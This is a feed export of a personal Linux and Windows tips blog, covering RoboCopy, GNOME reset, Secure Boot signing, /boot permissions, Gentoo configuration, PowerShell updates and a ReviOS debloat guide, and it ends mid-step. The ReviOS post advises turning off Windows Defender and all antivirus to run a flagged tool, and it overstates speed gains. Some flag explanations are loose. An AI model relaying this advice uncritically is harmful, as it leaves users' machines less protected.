- `/E`: Copy subdirectories, including empty ones
- `/MOVE`: Move files and directories (delete them from the source after copying)

### Files Parameters

- `/XF`: Exclude files
- `/PURGE`: Delete destination files that no longer exist in the source
- `/MOV`: Move files (delete them from the source after copying)
- `/MOVE`: Move files and directories (delete them from the source after copying)
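
Putting several of these parameters together, a mirror-style backup might look like the following sketch (the paths and exclusions here are illustrative examples, not from a real setup):

```bat
:: Sketch: mirror a project folder to a backup drive, copying all subfolders,
:: deleting files removed from the source, and skipping temp files and a cache dir
robocopy C:\projects D:\backup\projects /E /PURGE /XF *.tmp /XD cache
```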

Mastering these parameters empowers you to tailor RoboCopy to your specific file management needs, offering unparalleled efficiency and flexibility.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>A Quick Guide for Resetting GNOME ALL Settings</title><link>https://ummit.dev//posts/linux/desktop-environment/gnome/gnome-reset/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/desktop-environment/gnome/gnome-reset/</guid><description>Explore this quick guide to learn how to effortlessly reset all your GNOME settings using a simple terminal command, restoring your Linux desktop to its default configurations in no time</description><pubDate>Sat, 18 Nov 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Customizing your GNOME desktop environment on Linux can lead to various tweaks and adjustments. However, there may come a time when you want to revert all your GNOME settings to their default configurations. In such cases, the `dconf reset` command is your go-to solution. This quick guide will walk you through the simple steps to reset all your GNOME settings effortlessly.

### Why?

I had used GNOME for a long time, but I wanted to explore KDE and run multiple desktop environments side by side. After installing KDE, however, I encountered broken fonts that affected the display. I tried resetting my fonts, but it didn&apos;t work. In the end, resetting all of GNOME&apos;s settings fixed the issue. Follow these steps to do the same.

## Step 1: Open the Terminal

Begin by opening your terminal. You can do this by pressing `Ctrl + Alt + T` or using the application launcher.

## Step 2: Run the Reset Command

Enter the following command in the terminal:

```bash
dconf reset -f /org/gnome/
```

This command will reset all settings under the `/org/gnome/` path.

## Step 3: Confirm the Reset

After executing the command, there won&apos;t be any confirmation message. The reset happens instantly. You can now close the terminal.

## Conclusion

Whether you want a fresh start or need to troubleshoot issues related to your GNOME settings, the `dconf reset` command simplifies the process.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Linux TTY Guide</title><link>https://ummit.dev//posts/linux/tools/terminal/terminal-tty/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/terminal/terminal-tty/</guid><description>Explore the power of the Linux terminal with this comprehensive guide to TTY (teletypewriter) sessions. Learn how to navigate between virtual terminals, manage multiple sessions, troubleshoot graphical interface issues.</description><pubDate>Sat, 18 Nov 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you&apos;re a Linux user, you might find yourself in situations where the graphical interface becomes unresponsive or inaccessible. In such cases, the Linux terminal, accessed through TTY (teletypewriter) sessions, becomes a valuable tool. Here&apos;s a guide on how to use TTY for terminal navigation.

### Accessing TTY

To access TTY, use the key combination `Ctrl + Alt + F1` for the first virtual terminal. For additional virtual terminals, you can use `Ctrl + Alt + F2`, `Ctrl + Alt + F3`, and so on, up to `Ctrl + Alt + F6` or more, depending on your system configuration.

### Terminal Sessions

Each virtual terminal represents a separate terminal session. You can have multiple TTY sessions running concurrently, and each session operates independently. To switch between sessions, use the respective `Ctrl + Alt + F` key combination.

### Logging In

Once you access a TTY session, you&apos;ll be prompted to log in with your username and password. After successful authentication, you&apos;ll have a command-line interface to interact with your Linux system.

### Switching TTY

Use `Alt` + `left` and `right` arrow keys to quickly switch between tty sessions.

### Exiting TTY

To exit a TTY session, ensure you&apos;ve logged out of the session by typing `exit` or `logout` and pressing Enter. After logging out, you can switch back to the graphical interface using `Ctrl + Alt + F7` or the corresponding key combination for your system.

### TTY for Troubleshooting

TTY becomes particularly useful when you encounter issues with the graphical interface. If your desktop environment is unresponsive, switching to a TTY session allows you to troubleshoot and potentially resolve issues through the command line.

### Managing Multiple Sessions

While in a TTY session, you can have multiple TTY sessions open simultaneously. This is useful for multitasking and running different commands in parallel. To switch between open sessions, use the `Ctrl + Alt + F` key combination corresponding to the desired session.

### Conclusion

TTY sessions provide a powerful and efficient way to interact with your Linux system through the terminal. Whether you need to troubleshoot graphical interface issues or prefer a command-line environment, TTY offers flexibility and control. Experiment with TTY sessions to become more adept at navigating and managing your Linux system from the terminal.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Adding Secure Boot with Your Self-Certified Keys with Linux</title><link>https://ummit.dev//posts/linux/system/uefi/secure-boot/how-to-enable-secure-boot-with-self-cert/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/system/uefi/secure-boot/how-to-enable-secure-boot-with-self-cert/</guid><description>Unlock the full potential of your Linux system by enabling Secure Boot with your own self-certified keys. This step-by-step guide walks you through the process, ensuring a secure and seamless boot experience.</description><pubDate>Tue, 07 Nov 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

For a Linux user pursuing a secure system, enabling Secure Boot is an important step. Nonetheless, merely turning it on does not guarantee a smooth boot: the boot files on the Linux device must be signed first, or the system will refuse to boot. In this guide, I will lead you through the key creation and signing process on your Linux machine. This essential step guarantees a smooth start-up for your Linux system and takes your Linux device to the next level of security.

## Preparation

Before signing a key in the BIOS, there are some necessary steps you must do.

### 1. CSM Support

The options to enable and disable Secure Boot are only visible when CSM is disabled; otherwise they remain hidden. So make sure the CSM option is disabled.

&gt;Note: The CSM options are a feature that allows your system to load up legacy BIOS.

As our system always utilizes UEFI, it is time to bid farewell to the legacy BIOS. Simply disable it.

![CSM Support](https://www.technewstoday.com/wp-content/uploads/2023/07/csm-support-disabled-enabled-gigabyte.jpg)

### Secure Boot Mode

Now, navigate to the Secure Boot mode setting and change it from Standard to Custom. This puts the firmware into Setup Mode.

![Secure Boot mode](https://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1002061/11883f1.png)

### Delete Existing keys

Now delete all the existing keys in this setting. Some BIOS systems allow a simple one-click reset of all the keys.

![Existing keys delete](https://www.isunshare.com/images/article/windows-password/enable-disable-secure-boot-in-uefi-bios/clear-secure-boot-keys-in-asus.png)

### Factory Default keys

The factory default keys are no longer required and should be disabled, as we will be signing with our own keys.

![Factory-Default-keys.png](./Factory-Default-keys.png)

Now, Save the changes and Boot-up your system.

## What is `sbctl`?

Sbctl is intended to be a user-friendly secure boot key manager that can set up secure boot, provide key management capabilities, and track files that need to be signed in the boot chain.

The program is coded completely in Golang, with go-uefi for the API layer, and does not depend on existing secure boot tooling.

### Install `sbctl`

Install it using your package manager (shown here for Arch Linux):

```shell
sudo pacman -S sbctl
```

### 1. Create Keys

Generate new Secure Boot keys using the following command:

```shell
sudo sbctl create-keys
```

### 2. Enroll Keys

Enroll the newly created keys into the Secure Boot settings. On most hardware it is safer to also keep Microsoft&apos;s vendor keys (for example, for GPU option ROMs or dual-booting Windows); `sbctl enroll-keys` supports a `-m` flag for that:

```shell
sudo sbctl enroll-keys
```

### 3. Sign EFI Images

Identify EFI images that need signing (e.g., `BOOTX64.EFI`, `systemd-bootx64.efi`, `vmlinuz-linux`). Sign each image using `sbctl sign`:

```shell
sudo sbctl sign -s /boot/EFI/BOOT/BOOTX64.EFI
sudo sbctl sign -s /boot/EFI/systemd/systemd-bootx64.efi
sudo sbctl sign -s /boot/vmlinuz-linux
```

### 4. Verify Signed Keys

Use this command to verify that the keys were successfully signed or that existing keys are available on your system:

```shell
sudo sbctl verify
```

### 5. Enable Secure Boot

Now, Reboot your System and Return to BIOS, enable Secure Boot, and again reboot your system!

## Verification

There are several methods available to confirm if your system has enabled secure boot. Let us explore how to check and ensure system security.

### 1. Using bootctl

As I use the systemd init system, `bootctl` is the natural tool here. Simply run `bootctl` for an immediate result:

```shell
$ bootctl

System:
      Firmware: UEFI 2.80 (American Megatrends 5.27)
 Firmware Arch: x64
   Secure Boot: enabled (user)
  TPM2 Support: yes
  Boot into FW: supported

Current Boot Loader:
      Product: systemd-boot 254.5-1-arch
     Features: ✓ Boot counting
               ✓ Menu timeout control
               ✓ One-shot menu timeout control
               ✓ Default entry control
               ✓ One-shot entry control
               ✓ Support for XBOOTLDR partition
               ✓ Support for passing random seed to OS
               ✓ Load drop-in drivers
               ✓ Support Type #1 sort-key field
               ✓ Support @saved pseudo-entry
               ✓ Support Type #1 devicetree field
               ✓ Enroll SecureBoot keys
               ✓ Retain SHIM protocols
               ✓ Boot loader sets ESP information
          ESP: /dev/disk/by-partuuid/xxxxxxx-xxxxxxxxxx-xxxxxxxxxxx
         File: └─/EFI/systemd/systemd-bootx64.efi
```

The `bootctl` output shows `Secure Boot: enabled (user)`, which means the setup was successful.

### 2. Using sbctl

`sbctl` can also display the status of Secure Boot:

```shell
$ sbctl status

Installed:          ✓ sbctl is installed
Owner GUID:  xxxxxxxxx-xxxxxxx-xxxxxxxx-xxxx
Setup Mode:     ✓ Disabled
Secure Boot:  ✓ Enabled
Vendor Keys:  microsoft
```

If all the results display `✓`, then it means you are good!

## Conclusion

By following these steps, you&apos;ve securely enabled Secure Boot with your self-certified keys, allowing your system to boot only trusted software, enhancing its overall security.

## References

- [Reddit: Simple way to set up Secure Boot? ](https://www.reddit.com/r/archlinux/comments/ji0be6/simple_way_to_set_up_secure_boot/)
- [Arch wiki: User:Krin/Secure Boot, full disk encryption, and TPM2 unlocking install](https://wiki.archlinux.org/title/User:Krin/Secure_Boot,_full_disk_encryption,_and_TPM2_unlocking_install)
- [Install Secure Boot on Arch Linux (the easy way)](https://onion.tube/watch?v=yU-SE7QX6WQ)
- [Setting Up Secure Boot on Arch Linux Using sbctl](https://onion.tube/watch?v=R5dUWnSQIuY)
- [Github: sbctl](https://github.com/Foxboron/sbctl)
- [How to Enable Secure Boot in Bios Gigabyte✅](https://onion.tube/watch?v=waCl06Mg02E)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Fixing Security Vulnerabilities in systemd-boot /boot</title><link>https://ummit.dev//posts/linux/tools/boot-loader/systemd-boot/bootctl-warning-permission-fix/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/boot-loader/systemd-boot/bootctl-warning-permission-fix/</guid><description>Learn how to enhance your Linux system&apos;s security by fixing vulnerabilities in systemd-boot /boot</description><pubDate>Tue, 07 Nov 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Your bootloader files should not be readable by ordinary users. If a regular user can read `/boot` or `/efi`, it is recommended to lock down that access, and it only takes a few commands! For example, running `bootctl install` prints warnings like these:

```shell
Copied &quot;/usr/lib/systemd/boot/efi/systemd-bootx64.efi&quot; to &quot;/efi/EFI/systemd/systemd-bootx64.efi&quot;.
Copied &quot;/usr/lib/systemd/boot/efi/systemd-bootx64.efi&quot; to &quot;/efi/EFI/BOOT/BOOTX64.EFI&quot;.
⚠️ Mount point &apos;/efi&apos; which backs the random seed file is world accessible, which is a security hole! ⚠️
⚠️ Random seed file &apos;/efi/loader/random-seed&apos; is world accessible, which is a security hole! ⚠️
Random seed file /efi/loader/random-seed successfully refreshed (32 bytes).
Created EFI boot entry &quot;Linux Boot Manager&quot;.
```

## What&apos;s the problem?

The problem is that a normal user can access your `/boot` directory. Even though normal users cannot modify it, they can still read the contents of `/boot` without needing root access.

&gt;In my opinion, the `/boot` path should be accessible only to the root user, even for reading, not just writing.

### So what should you do now?

Just change the permissions on your `/boot` directory. Here&apos;s how to do it!

## FAT32

If the boot partition is formatted as FAT32, changing the permissions is not a simple `chmod`: FAT32 does not store Unix permission bits, so they must instead be set at mount time with additional fstab options. Here&apos;s how:

### Step 1: Edit fstab Configuration

1. Open the fstab configuration file using your preferred text editor (for instance, vim).

   ```shell
   sudo vim /etc/fstab
   ```

2. Add `fmask=0137,dmask=0027` to the `/boot` partition options as shown:

   ```shell
   # /dev/sda1

   UUID=xxxx-xxxx      /boot       vfat        rw,relatime,fmask=0137,dmask=0027,errors=remount-ro     0 2
   ```

3. Save the file and exit the editor.
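
For reference, a vfat mask simply removes the masked permission bits from the full mode 0777, so the effective modes produced by the options above can be computed by plain octal subtraction (valid here because the mask bits are a subset of 0777):

```shell
# fmask=0137 applies to files, dmask=0027 to directories.
# Effective mode = 0777 minus the mask bits.
printf 'files: %04o\n' $(( 0777 - 0137 ))   # 0640: rw-r-----, no access for others
printf 'dirs:  %04o\n' $(( 0777 - 0027 ))   # 0750: rwxr-x---, no access for others
```

With these modes, the "others" class gets no access at all, which is exactly what the bootctl warnings complained about.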

### Step 2: Adjust Permissions

fstab is a table that tells the system which filesystems to mount, and with which options, when it boots up. Because this table is only read during boot, the options you just added will not take effect until you restart (or manually remount the filesystem).

1. Reboot your system to apply the changes made in the fstab configuration.

2. After rebooting, change the permissions for the random seed file to restrict world access.

   ```shell
   sudo chmod o-rwx /boot/loader/random-seed
   ```

3. Similarly, ensure the `/boot` directory is secure by adjusting its permissions.

   ```shell
   sudo chmod o-rwx /boot
   ```

4. Now, reinstall the boot files with `bootctl` as shown below, then attempt to access the `/boot` directory as a normal user. You will no longer be able to read the directory; it is safe now!

    ```shell
    $ sudo bootctl --path=/boot/ install

    [sudo] password for user:
    Copied &quot;/usr/lib/systemd/boot/efi/systemd-bootx64.efi.signed&quot; to &quot;/boot/EFI/systemd/systemd-bootx64.efi&quot;.
    Copied &quot;/usr/lib/systemd/boot/efi/systemd-bootx64.efi.signed&quot; to &quot;/boot/EFI/BOOT/BOOTX64.EFI&quot;.
    Random seed file /boot/loader/random-seed successfully refreshed (32 bytes).
    Created EFI boot entry &quot;Linux Boot Manager&quot;.
    ```
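
If you want to see what `chmod o-rwx` does before touching `/boot`, you can rehearse it on a scratch directory; this is purely illustrative and uses a temp dir, not your real boot partition:

```shell
# Rehearse the permission change on a disposable directory.
d=$(mktemp -d)
chmod 755 "$d"      # start from a world-readable mode
chmod o-rwx "$d"    # strip all access for "others", same as done for /boot
stat -c '%a' "$d"   # prints 750
rmdir "$d"
```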

## Conclusion

By following these steps, you have successfully eliminated the security vulnerabilities in systemd-boot. Your Linux system is now shielded from unauthorized access, enhancing the overall security of your computing environment. Stay vigilant and proactive in maintaining your system&apos;s security to enjoy a seamless and protected Linux experience.

## Reference

- [bootctl install” outputs some warnings about /efi mount point and random seed file in the terminal](https://forum.endeavouros.com/t/bootctl-install-outputs-some-warnings-about-efi-mount-point-and-random-seed-file-in-the-terminal/43991)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Gentoo Linux: Some common problem with package installing</title><link>https://ummit.dev//posts/linux/distribution/gentoo/gentoo-common-problem-with-custom-package/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/gentoo/gentoo-common-problem-with-custom-package/</guid><description>In this article, we&apos;re going to talk about how to solve package installation problems on gentoo, such as package.use this common problem.</description><pubDate>Sat, 28 Oct 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

As is widely known, Gentoo is a highly customizable Linux distribution, which makes command-line work and per-package configuration essential. Distributions such as Arch rely on developer presets: you do not need to set anything up, and simply installing a package is sufficient. On Gentoo, by contrast, there are situations where you must customize a package&apos;s configuration before it can even be installed. In this guide, I will explain how to solve the most common of these problems when installing certain packages on Gentoo.

In addition, I believe Gentoo articles should not hardcode exact configuration snippets, because every Gentoo system is customized differently; you always need to consider what your own configuration looks like. That is why this blog focuses on how to solve the general class of problem rather than one exact setup.

### Problem: Package Use Customization

In Gentoo, the ability to customize your system extensively is one of its core strengths. Package use flags are a fundamental aspect of this customization. They allow you to enable or disable specific features or dependencies for packages during installation. However, occasionally, you might encounter situations where a package&apos;s default use flags don&apos;t align with your requirements.

### Solution: Customizing Package Use Flags

To address this issue, you can customize package use flags by modifying the `package.use` file. Here&apos;s a breakdown of the provided command:

```shell
echo &quot;&gt;=media-plugins/alsa-plugins-1.2.7.1-r1 pulseaudio&quot; &gt; /etc/portage/package.use/alsa-plugins
```

In this command:

- `&gt;=media-plugins/alsa-plugins-1.2.7.1-r1`: Specifies the package and version for which the use flag is being set.
- `pulseaudio`: Indicates the specific use flag being enabled. In this case, it enables support for the PulseAudio sound server.

#### More Explanation:

- **Understanding Use Flags:**
  - Use flags are keywords that represent specific features or options associated with packages.
  - Enabling a use flag means allowing the package to incorporate the associated feature during installation.

- **Choosing the Right Use Flags:**
  - It&apos;s crucial to research the correct use flags for your packages. Gentoo&apos;s documentation and package information provide details on available flags.

- **Multiple Use Flags:**
  - You can specify multiple use flags for a package by separating them with spaces.
  - For example, to enable both `flag1` and `flag2`:
    ```shell
    echo &quot;category/package flag1 flag2&quot; &gt; /etc/portage/package.use/custom-file
    ```

By customizing package use flags, you ensure that packages are installed with the specific features and options you need. This level of fine-tuning is one of the reasons Gentoo remains a favorite among Linux enthusiasts and experts alike.

### Problem: Package Accept Keywords Customization

In Gentoo, package acceptance is governed by keywords, which denote stability levels for packages. Sometimes, you may need to accept specific versions of packages that are not yet marked as stable. Here&apos;s how to address this issue:

```shell
echo &quot;media-libs/libpulse ~amd64&quot; &gt;&gt; /etc/portage/package.accept_keywords/libpulse
```

In this command, we&apos;re adding a specific version of the `media-libs/libpulse` package to the accept keywords file. The `~amd64` keyword indicates that the package is accepted for the `amd64` architecture, but it might not be stable yet. By managing package accept keywords, you can control which package versions are available for installation.
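
Note that this command appends with `&gt;&gt;`, while the earlier `package.use` example overwrote with `&gt;`; repeated appends accumulate entries, whereas an overwrite replaces the whole file. A scratch-file sketch of the difference (the package atoms are only placeholders):

```shell
# Scratch-file demo; the package atoms below are placeholders, not real advice.
f=$(mktemp)
echo "media-libs/libpulse ~amd64" | tee -a "$f"   # append: creates the file
echo "app-misc/example ~amd64"    | tee -a "$f"   # append: keeps the first line
wc -l "$f" | cut -d' ' -f1                        # 2: both entries were kept
rm "$f"
```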

### Additional Tips for Package Acceptance:

1. **Understanding Keywords:**
   - `~amd64`: Unstable package version for `amd64` architecture.
   - `amd64`: Stable package version for `amd64` architecture.
   - `~x86`: Unstable package version for `x86` architecture.
   - `x86`: Stable package version for `x86` architecture.

2. **Using Masking:**
   - You can mask a package to prevent its installation. For example:
     ```shell
     echo &quot;&gt;=media-libs/package-1.2.3&quot; &gt;&gt; /etc/portage/package.mask/package
     ```

Managing package accept keywords allows you to fine-tune your Gentoo system, ensuring that specific package versions are available for installation while maintaining control over stability levels. By customizing these keywords, you can tailor your Gentoo environment to your specific requirements.

## Reference

- [How to unmask this package?](https://www.reddit.com/r/Gentoo/comments/t64ge4/how_to_unmask_this_package/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Manually Updating Windows with PowerShell</title><link>https://ummit.dev//posts/windows/terminal/windows-update-with-powershell/</link><guid isPermaLink="true">https://ummit.dev//posts/windows/terminal/windows-update-with-powershell/</guid><description>Discover the power of PowerShell in managing Windows updates. This quick guide provides step-by-step instructions on how to manually update your Windows system.</description><pubDate>Sun, 15 Oct 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Even if you&apos;ve removed the built-in Windows Update GUI, there&apos;s still a way to keep your system up-to-date. PowerShell comes to the rescue, offering a robust module for manual Windows updates. This guide is tailored for scenarios where you&apos;ve disabled the native Windows update mechanisms and need a controlled method to ensure your system stays current.

### Prerequisites

Before you begin, make sure you have PowerShell installed on your system. Most modern versions of Windows come with PowerShell pre-installed. Additionally, ensure you have the PSWindowsUpdate module installed. If you don&apos;t have it yet, you can install it using the following command in PowerShell:

```powershell
Install-Module -Name PSWindowsUpdate -Force -SkipPublisherCheck
```

## Step 1: Checking Available Updates

You can start by checking for available updates on your system. Use the following command to view the available updates:

```powershell
Get-WindowsUpdate
```

This command will display a list of available updates, allowing you to see what needs to be installed.

## Step 2: Installing Updates

To install updates, you can use the `Install-WindowsUpdate` cmdlet. Here&apos;s a basic command to install all available updates:

```powershell
Install-WindowsUpdate -MicrosoftUpdate -AcceptAll
```

In this command, `-MicrosoftUpdate` ensures you&apos;re getting updates from Microsoft, and `-AcceptAll` installs all available updates without prompting for confirmation.

## Step 3: Controlling Reboots

Managing reboots after installing Windows updates is crucial to ensure a smooth and uninterrupted user experience. PowerShell provides options to control the reboot behavior according to your preferences.

### Automatic Reboot

Windows updates usually require a reboot to apply the changes. If you want the reboot to happen automatically as soon as installation finishes, use the following command:

```powershell
Install-WindowsUpdate -MicrosoftUpdate -AcceptAll -AutoReboot
```

Adding the `-AutoReboot` parameter ensures that your system will automatically restart after the updates are installed, eliminating the need for manual intervention.

### Manual Reboot

However, there might be scenarios where you prefer to reboot your system at a more convenient time, especially if you are in the middle of important tasks. To prevent an immediate reboot after updates, you can use the `-IgnoreReboot` parameter:

```powershell
Install-WindowsUpdate -MicrosoftUpdate -AcceptAll -IgnoreReboot
```

Using `-IgnoreReboot` disables the automatic reboot, giving you the flexibility to manually restart your system when it&apos;s convenient for you. This option allows you to complete your work or save your progress before applying the updates.
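
If you later want to review what was installed, the PSWindowsUpdate module also provides a `Get-WUHistory` cmdlet. A quick sketch (the exact output columns depend on your module version):

```powershell
# Show the ten most recent entries from the Windows Update history.
# Property names here reflect typical Get-WUHistory output.
Get-WUHistory | Select-Object -First 10 Date, Title
```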

## Conclusion

This quick guide should help anyone who has removed Windows Update altogether or simply wants to update Windows from the command line. As a bonus, updating through PowerShell is often faster than using the built-in GUI.

## Reference

- [How to Install Windows Updates with PowerShell? [Tutorial]](https://www.partitionwizard.com/partitionmagic/powershell-windows-update.html)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Customize Windows 10/11 with ReviOS</title><link>https://ummit.dev//posts/windows/custom/revios/</link><guid isPermaLink="true">https://ummit.dev//posts/windows/custom/revios/</guid><description>Discover the power of ReviOS, an open-source solution to streamline your Windows 10/11 experience. Say goodbye to unnecessary bloatware and become a more efficient system.</description><pubDate>Wed, 11 Oct 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Windows operating systems often come with a lot of pre-installed software, which can significantly slow down your computer&apos;s performance. Despite attempting to remove them, these unwanted programs tend to reappear after a while. This is a common issue faced by many Windows users. However, there is a solution: ReviOS.

### How Can ReviOS Help?

In this article, I will introduce you to ReviOS, a program designed specifically for Windows 10/11 to strip down unnecessary elements from your installation, including applications like Edge and Internet Explorer. By removing these programs, ReviOS can potentially double your Windows system’s speed. It achieves this by eliminating up to 70 built-in applications that often slow down your Windows 10/11 computer.

### What Exactly is ReviOS?

[ReviOS](https://revi.cc/) is an open-source software maintained by the community. Its primary goal is to create a customized version of Windows that offers improved performance. While Windows 10/11 doesn&apos;t inherently require powerful hardware, the presence of unnecessary built-in software can demand more resources, affecting your system&apos;s speed. ReviOS aims to address this issue.

### Pre-Installation Steps

Before installing ReviOS, it&apos;s crucial to follow these steps:

1. Ensure you have a fresh Windows installation.
2. Update your new Windows installation.
3. Install ReviOS after completing the updates.

Now, let&apos;s proceed with the installation process.

## Step 1: Download Required Files

Visit the [ReviOS website](https://revi.cc/revios/download) and download two essential software:

1. **AME Wizard**: Click the download button on the [AME Wizard page](https://ameliorated.io/).

   ![AME Wizard](./Download-tools/AME Wizard.png)

2. **ReviOS Playbook**: Download the `apbx` file from the [ReviOS Playbook GitHub release page](https://github.com/meetrevision/playbook/releases).

   ![ReviOS playbook](./Download-tools/ReviOS-playbook.png)

AME Wizard acts as an injector, allowing you to modify your Windows system. ReviOS is the program you&apos;ll inject into it. Now, let&apos;s move on to the installation steps.

## Step 2: Launch the AME Wizard

Start the AME Wizard program. You might need administrative permissions, so click &quot;Yes&quot; when prompted.

&gt; **Note**: Windows Defender might flag this program as harmful, leading to its closure. To proceed, disable all antivirus settings. You will also be asked to close the antivirus during the next step. Whether you do it now or later doesn&apos;t matter; just ensure it&apos;s closed before continuing.

   ![select playbook](./Download-tools/Select-playbook.png)

## Step 3: Inject ReviOS Playbook into AME Wizard

Drag and drop the downloaded `apbx` file into AME Wizard and click &quot;Next.&quot;

   ![Disable windows security](./Disable/Disable-windows-security.png)

## Step 4: Disable Windows Security

As mentioned earlier, turn off all Windows security settings. Click &quot;Next&quot; once all security options turn gray.

   ![Disable windows security-2](./Disable/Disable-windows-security-2.png)

## Step 5: Verify Windows Build Requirements

Wait for the playbook to validate your Windows version.

   ![Verifying windows](./verifying/verifying.png)

After validation, if the program confirms that your system meets the playbook&apos;s requirements, click &quot;Next.&quot;

   ![Verifying windows-2](./verifying/verifying-2.png)

## Step 6: Accept the License Agreement

Read the license agreement on this page, then click &quot;Next.&quot;

   ![License](./License/License.png)

Click &quot;Agree.&quot;

   ![License-2](./License/License-2.png)

## Step 7: Customize Features (Optional)

ReviOS offers several customization features in this step. If you don&apos;t wish to customize, simply click &quot;Next.&quot; However, let&apos;s explore the options. Click &quot;Select Features.&quot;

   ![Select features](./Select-features/Select-features.png)

The first feature allows you to choose your preferred browser.

   ![Select features 2](./Select-features/Select-features-2.png)

Select the components you want to install or remove. It&apos;s recommended to select all components. Once done, click &quot;OK.&quot;

   ![Select features 3](./Select-features/Select-features-3.png)

After confirming your choices, click &quot;Next.&quot;

   ![Select features 4](./Select-features/Select-features-4.png)

## Step 8: Apply Changes

Wait for the playbook to complete the process. The option to automatically restart the system is selected by default. If you don&apos;t choose this option, restart manually after the process finishes.

&gt; **Note**: Do not perform any actions until the process completes. Be patient in case of any unexpected issues.

   ![apply](./apply/apply.png)
   ![apply 2](./apply/apply-2.png)
   ![apply 3](./apply/apply-3.png)

## Step 9: Completion

After restarting your system, you&apos;ll notice the changes, including the new wallpaper!

   ![finish](./done/finish.png)

### Process Optimization

Check Task Manager to observe the reduced number of running processes. ReviOS dramatically reduces the count: originally there could be up to 130 processes, and with a reduction ratio of approximately 2.28, ReviOS cuts the number of running processes by more than half (to roughly 57).

   ![Processes](./done/Processes.png)

### Revision Tool

After installing ReviOS, you&apos;ll find a program called Revision Tool. This tool allows further customization, such as enabling updates and Windows Defender. These settings are entirely up to you.

   ![Revision Tool](./Revision-Tools/Revision Tool.png)
   ![Revision Tool-2](./Revision-Tools/Revision Tool-2.png)
   ![Revision Tool-3](./Revision-Tools/Revision Tool-3.png)

## Is ReviOS Recommended?

I have previously used AtlasOS, but it didn&apos;t work well for me. The main issue was its complete removal of the Windows update function. Some Windows programs require updates for proper installation. ReviOS, however, allows you to enable updates instead of removing the function entirely.

Overall though, I think ReviOS is the most balanced, you don&apos;t need to customize it too much because the default installation is already what most people want. Just like out of the box</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Comprehensive Guide to Gentoo Linux: Installing GNOME, Wayland and GDM with OpenRC</title><link>https://ummit.dev//posts/linux/distribution/gentoo/gentoo-gnome-wayland-gdm/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/gentoo/gentoo-gnome-wayland-gdm/</guid><description>Learn how to set up GNOME on your Gentoo system with Wayland and the GDM display manager. Follow these steps to configure your environment for a seamless GNOME experience.</description><pubDate>Tue, 26 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the previous article, I demonstrated how to install XFCE, and this comprehensive guide will walk you through the process of installing and configuring GNOME on your Gentoo system (as shown in the image below):

![gnome-gentoo](./neofetch.png)

## Step 1: Select Your Profile

The first step is selecting the profile. Gentoo offers various profiles to cater to different needs. To see the available profiles, run the following command:

```shell
eselect profile list
```

Browse the list and identify the one that matches your requirements. Typically, you&apos;ll find a profile like `default/linux/amd64/17.1/desktop/gnome (stable)`. Once you&apos;ve pinpointed your choice, set it as your active profile. Replace the number `6` with the corresponding number from your list:

```shell
eselect profile set 6
```

## Step 2: Configuring make.conf for GNOME Installation

With your chosen Gentoo profile set, it&apos;s time to fine-tune your system to ensure a flawless GNOME installation. This step involves configuring your `make.conf` file, which plays a pivotal role in managing package compilation and runtime behavior. Follow these instructions to adjust the necessary settings:

### 1. Open your `make.conf` file

Begin by opening your `make.conf` file in a text editor. You can utilize the &quot;nano&quot; text editor for this task:

```shell
nano /etc/portage/make.conf
```

### 2. Modify your USE flags

Inside the `make.conf` file, you&apos;ll find a section for your USE flags. Modify this section to include the following flags, which are essential for an optimized GNOME installation:

```shell
USE=&quot;... wayland gtk gnome dbus elogind minimal -X&quot;
INPUT_DEVICES=&quot;libinput&quot;
VIDEO_CARDS=&quot;qxl&quot;
```

Let&apos;s delve into the purpose of each USE flag:

- **wayland:** Enabling this flag extends support for the Wayland display protocol, a contemporary alternative to the aging X11.

- **gtk:** Inclusion of this flag guarantees compatibility with the GTK toolkit, a fundamental requirement for running GNOME applications.

- **gnome:** The presence of this flag communicates your intent to install GNOME, prompting the system to fetch the necessary dependencies.

- **dbus:** Activation of D-Bus support is crucial for establishing seamless communication between applications and the GNOME desktop environment.

- **elogind:** Enabling this flag ensures proper integration with elogind, a critical component for managing user sessions in Gentoo.

- **minimal:** Opting for a minimal installation ensures that only essential GNOME components are included, effectively sidestepping unnecessary bloat.

- **-X:** The exclusion of the `-X` flag signifies that you&apos;re not enabling X Window System compatibility, as Wayland serves as the primary display protocol.

By meticulously configuring these variables within your `make.conf` file using the provided settings, you&apos;re effectively preparing your system&apos;s package management system for a seamless GNOME installation. Each flag serves a distinct purpose, collectively ensuring that GNOME functions optimally within the Gentoo ecosystem.

### 3. Save your changes

After making these modifications, save the changes to your `make.conf` file. In the &quot;nano&quot; text editor, you can typically save changes by pressing &quot;Ctrl + O&quot; and then confirming the file name with &quot;Enter.&quot; To exit the editor, press &quot;Ctrl + X.&quot;

## Step 3: Set Package Versions

To proceed smoothly with the installation, we need to specify the versions of certain packages. This step helps ensure compatibility. Run the following commands to set the desired package versions.

&gt;IMPORTANT: Again, your versions will not necessarily match these; the commands below only demonstrate the versions current at the time of writing. To find out which versions you need, run the GNOME base install (Step 4) once and adjust according to the messages Portage prints.

```shell
echo &quot;&gt;=media-libs/clutter-1.8.4-r1 X&quot; &gt; /etc/portage/package.use/clutter
